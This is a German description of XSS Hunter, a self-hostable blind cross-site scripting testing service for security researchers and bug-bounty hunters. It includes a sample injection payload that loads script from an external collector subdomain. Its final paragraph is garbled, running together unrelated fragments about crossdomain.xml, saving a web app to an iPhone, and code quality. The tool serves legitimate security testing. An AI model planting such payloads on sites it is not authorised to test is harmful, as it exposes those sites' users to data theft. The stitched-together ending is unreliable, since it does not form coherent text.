
Der XSS Hunter Dienst - eine tragbare Version von XSSHunter.com
Mehr Informationen hier: https://github.com/mandatoryprogrammer/xsshunter-express
Dies ist eine portable Version des Quellcodes, der auf https://xsshunter.com läuft. Es ist so konzipiert, dass es einfach auf jedem Server installiert werden kann, für Sicherheitsexperten und Bug-Bounty-Jäger, die XSS auf eine viel leistungsfähigere Weise testen möchten.
Wenn Sie diese Software nicht einrichten möchten und lieber einfach mit dem Testen beginnen möchten, besuchen Sie https://xsshunter.com .
Bitte besuchen Sie https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ für Informationen zur Einrichtung von XSS Hunter auf Ihrem eigenen Server.
Nach der Registrierung erstellen Sie eine spezielle kurze Domain wie yoursubdomain.xss.ht, die Ihre XSS-Schwachstellen identifiziert und Ihren Payload hostet. Dann verwenden Sie diese Subdomain in Ihren XSS-Tests mit Injektionsversuchen wie "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter stellt automatisch XSS-Sonden bereit und sammelt die resultierenden Informationen, wenn sie ausgelöst werden.
crossdomain.xml-Richtlinien in internen Systemen zu finden, auf die normalerweise nicht zugegriffen werden kann./app und speichern Sie die Seite als Webanwendung auf dem Desktop Ihres iPhones.Der gesamte Code wurde von mir erstellt und ist (aus diesem Grund) wahrscheinlich nicht Best Practice und definitiv optimierungs-/aufräumbedürftig. Jegliche Pull-Requests werden geschätzt!